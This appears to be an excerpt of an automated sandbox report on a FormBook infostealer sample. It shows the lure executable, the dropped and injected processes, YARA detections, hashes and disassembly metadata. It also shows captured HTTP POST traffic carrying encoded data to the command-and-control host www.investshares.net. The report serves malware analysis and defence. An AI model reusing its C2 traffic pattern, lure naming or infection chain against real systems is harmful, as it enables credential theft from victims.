                                              17 | 192.168.2.7 | 49988 | 154.197.162.239 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:13:10.939888954 CET | 763 | OUT | POST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIIDNAclZi5t1awxi5Y3UecaeTytqzWu7TVbWdQJkPVHMZ4/1/pQ==
                                              Jan 13, 2025 15:13:11.105389118 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Sun, 12 Jan 2025 22:12:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              18 | 192.168.2.7 | 49989 | 154.197.162.239 | 80
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:13:13.492908955 CET | 783 | OUT | POST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLmo2vOFBImmXaSFdrQuKwpz1tU7/kcI3X3WKZgtFBOn8ONnM4U=
                                              Jan 13, 2025 15:13:14.070802927 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Sun, 12 Jan 2025 22:12:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              19 | 192.168.2.7 | 49990 | 154.197.162.239 | 80
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:13:16.038543940 CET | 1796 | OUT | POST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6= [TRUNCATED]
                                              Jan 13, 2025 15:13:16.637634039 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Sun, 12 Jan 2025 22:12:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Target ID:0
                                              Start time:09:11:04
                                              Start date:13/01/2025
                                              Path:C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe"
                                              Imagebase:0xe60000
                                              File size:298'496 bytes
                                              MD5 hash:2A3034ABC9B8EE8875F9CD98C388AB07
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:09:11:37
                                              Start date:13/01/2025
                                              Path:C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe"
                                              Imagebase:0xc30000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Target ID:10
                                              Start time:09:11:39
                                              Start date:13/01/2025
                                              Path:C:\Windows\SysWOW64\fc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\fc.exe"
                                              Imagebase:0x240000
                                              File size:22'528 bytes
                                              MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:11
                                              Start time:09:11:52
                                              Start date:13/01/2025
                                              Path:C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe"
                                              Imagebase:0xc30000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Target ID:13
                                              Start time:09:12:04
                                              Start date:13/01/2025
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff722870000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5.1%
                                                Signature Coverage:8.8%
                                                Total number of Nodes:136
                                                Total number of Limit Nodes:8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "$"
                                                • API String ID: 0-3758156766
                                                • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                • Instruction ID: 882b458e2e4b2abeceecc48a82dc5ba9df15bf94042b8b54631b65b73c24fa2a
                                                • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                • Instruction Fuzzy Hash: C8F1A0B1D4020AAFDB24DB64CD89AEEB7B9EF54304F14D1A9E50DB7241DB309E45CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: gfff$qi
                                                • API String ID: 0-3408824469
                                                • Opcode ID: f2321796db326caa4d5e26790d32298b7b42190df4ff02b7d4df2c086c5aa2be
                                                • Instruction ID: de3c4ccbffed3d453be11a3ce995a70a6fa294b80e5c4ba434625852ff4679f9
                                                • Opcode Fuzzy Hash: f2321796db326caa4d5e26790d32298b7b42190df4ff02b7d4df2c086c5aa2be
                                                • Instruction Fuzzy Hash: F5A1C1726883564FC70FCA6CAC926E8BF59DB513A4F1C62EED851EF1D2E211891687C0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 284 e77ca3-e77ccc call e8f7e3 287 e77cd2-e77ce0 call e8fde3 284->287 288 e77cce-e77cd1 284->288 291 e77ce2-e77ced call e90083 287->291 292 e77cf0-e77d01 call e8e283 287->292 291->292 297 e77d03-e77d17 LdrLoadDll 292->297 298 e77d1a-e77d1d 292->298 297->298
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00E77D15
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                • Instruction ID: efcdf800d9fcc6e5c069303d6fe62d12df9842f24e035a98fab3265714659dba
                                                • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                • Instruction Fuzzy Hash: 6E0112B5D0010DABDF10EBE4DC52FDDB7B89B54708F0081A5E90CA7240F671EB548B91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 304 e8cb43-e8cb7f call e64903 call e8dd73 NtClose
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00E8CB7A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                • Instruction ID: 49d974b991769118624187df44e7319b7c77229ecffb9cfcb0c53e18cde15824
                                                • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                • Instruction Fuzzy Hash: F0E04672244244BBD220EA69DC02F9BB7ACDFC5760F008559FA5CA7282C670B91187E0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 318 1542b60-1542b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 20f30e4b7cafd533dac918f6e76bb43cda8cc7ce23bf44c639bcdbcfe224c1ca
                                                • Instruction ID: c3f1ab954ab0669fce2e637d38d7f7984cb6b429c2f6d73565d12027c64adf95
                                                • Opcode Fuzzy Hash: 20f30e4b7cafd533dac918f6e76bb43cda8cc7ce23bf44c639bcdbcfe224c1ca
                                                • Instruction Fuzzy Hash: 8490026120240003424571598424616404AA7E0211B59C422F5014990DC56589916625
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6957da4f0f4a614605283ed2a4a2e912a9db0f9ba09646c2105282a927e5f764
                                                • Instruction ID: ae7835c0abc37fb4ca6e2ae1ab23abc5050d91e321a25ad2815719b8653d95ae
                                                • Opcode Fuzzy Hash: 6957da4f0f4a614605283ed2a4a2e912a9db0f9ba09646c2105282a927e5f764
                                                • Instruction Fuzzy Hash: AD90023120140413D251715985147070049A7D0251F99C813B4424958DD6968A52A621

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 319 1542c70-1542c7c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 60bf26d0be264ab906dcf47f1d84c6e4a2f7e74bd92d4f8cfd1af30db8c41a0d
                                                • Instruction ID: 7108b7be424c5f57785ed805eebff95032cac6fd076012b76cc38fab18b49d38
                                                • Opcode Fuzzy Hash: 60bf26d0be264ab906dcf47f1d84c6e4a2f7e74bd92d4f8cfd1af30db8c41a0d
                                                • Instruction Fuzzy Hash: A390023120148802D2507159C41474A0045A7D0311F5DC812B8424A58DC6D589917621
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6c3fe2c9becd614b6b1bc02dad9edfe37dd68ae42eca81eb55d2f2d379966ea5
                                                • Instruction ID: 9a862733508b2763e59152d80e44f63bdb7c8e0fb002ac27219981ccee086967
                                                • Opcode Fuzzy Hash: 6c3fe2c9becd614b6b1bc02dad9edfe37dd68ae42eca81eb55d2f2d379966ea5
                                                • Instruction Fuzzy Hash: 1C90023160550402D240715985247061045A7D0211F69C812B4424968DC7D58A516AA2

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00E7456A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 17O3k-2I$17O3k-2I
                                                • API String ID: 1836367815-2455829943
                                                • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                • Instruction ID: 8bad6e7109d61c0fa2576a2b262fbcf344f7a336b94c76be4cd36f41a57e391b
                                                • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                • Instruction Fuzzy Hash: 6B112BB2D441497ADB11DBA08C41DEE7FBCEF40358F049069F558B7141D7348E068BA0

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00E7456A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 17O3k-2I$17O3k-2I
                                                • API String ID: 1836367815-2455829943
                                                • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                • Instruction ID: a34b307e63f2a0fd0d9f10a606a7251643f66f1d04eb4a9c44caad895c8ad2fa
                                                • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                • Instruction Fuzzy Hash: 5E01D6B2D0024C7ADB11BBE08C82DEFBBBCEF41794F048064FA18B7141D6648E068BA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 41 e8ceb3-e8cef4 call e64903 call e8dd73 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00E8CEEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: i
                                                • API String ID: 3298025750-1498560215
                                                • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                • Instruction ID: 99d98ff87134d3b9b8078d55b6d1d8c949d0a6c9c3f13633deeb06e0d1f0da94
                                                • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                • Instruction Fuzzy Hash: ADE06DB2604204BBD610EE58EC41F9F37ACEFC8750F004008F918A7282C771B9118BB4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 299 e8ce63-e8cea7 call e64903 call e8dd73 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,00E7EA4E,?,?,00000000,?,00E7EA4E,?,?,?), ref: 00E8CEA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                • Instruction ID: bb9a80a83a40450a28248df32321600a1fcc3f17a7d6c3b0d4a760d249ecf074
                                                • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                • Instruction Fuzzy Hash: 51E06DB2254244BBD614EE58DC42EAB77ACEFC8710F004049FA0CA7282C770B91087B4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 309 e8cf03-e8cf38 call e64903 call e8dd73 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 00E8CF33
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                • Instruction ID: c87f77afdc621b9b73db4e42ff1e2c9762ee25c857808fc8f2c880c42b6e8677
                                                • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                • Instruction Fuzzy Hash: F6E08C722406147BC220FA59EC01F9B77ACDFC5760F108099FA0CA7286D6B0B9108BF4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 314 1542c0a-1542c0f 315 1542c11-1542c18 314->315 316 1542c1f-1542c26 LdrInitializeThunk 314->316
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d0afdb8c79e26f09b5ade5db45a7ef7a09732c34f66b12b3cf07f947c66754e8
                                                • Instruction ID: ee161e0a19588cc4218815fdf9027514e25112931c4ada40987799a252a33b72
                                                • Opcode Fuzzy Hash: d0afdb8c79e26f09b5ade5db45a7ef7a09732c34f66b12b3cf07f947c66754e8
                                                • Instruction Fuzzy Hash: 66B09B719015D5D6DB51E765960871B794077D0715F19C462F2030A41F4778C1D1E675
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 32ff4db322d93a9e20bc2e1bd44b66eca30e32f8db51c2373d270ee01b3c6d5f
                                                • Instruction ID: 5a8dfbf41ccc595c0b8f08617180b114c57483327efd21739ac4049b39385c11
                                                • Opcode Fuzzy Hash: 32ff4db322d93a9e20bc2e1bd44b66eca30e32f8db51c2373d270ee01b3c6d5f
                                                • Instruction Fuzzy Hash: 5A928171608742AFE721EF19C840B6BBBE8BF84754F04491DFA95EB290D770E845CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-3089669407
                                                • Opcode ID: a5efb047284114699228e1fb703c3818deca84a5d00a37ffbaebe74702176aff
                                                • Instruction ID: 341b5b38adf29099abd8d53176634371f583929e5de7d7bdb84700803ef57b60
                                                • Opcode Fuzzy Hash: a5efb047284114699228e1fb703c3818deca84a5d00a37ffbaebe74702176aff
                                                • Instruction Fuzzy Hash: 478175B2D12619BF9B11EBD4DDD4EDE77BDAB14714716042BBA10FB110E630DE089BA0
                                                Strings
                                                • PreferredUILanguages, xrefs: 015A63D1
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 015A5A84
                                                • LanguageConfiguration, xrefs: 015A6420
                                                • @, xrefs: 015A6277
                                                • PreferredUILanguagesPending, xrefs: 015A61D2
                                                • @, xrefs: 015A6027
                                                • LanguageConfigurationPending, xrefs: 015A6221
                                                • InstallLanguageFallback, xrefs: 015A6050
                                                • @, xrefs: 015A647A
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015A635D
                                                • @, xrefs: 015A63A0
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015A5FE1
                                                • Control Panel\Desktop, xrefs: 015A615E
                                                • @, xrefs: 015A61B0
                                                Memory Dump Source
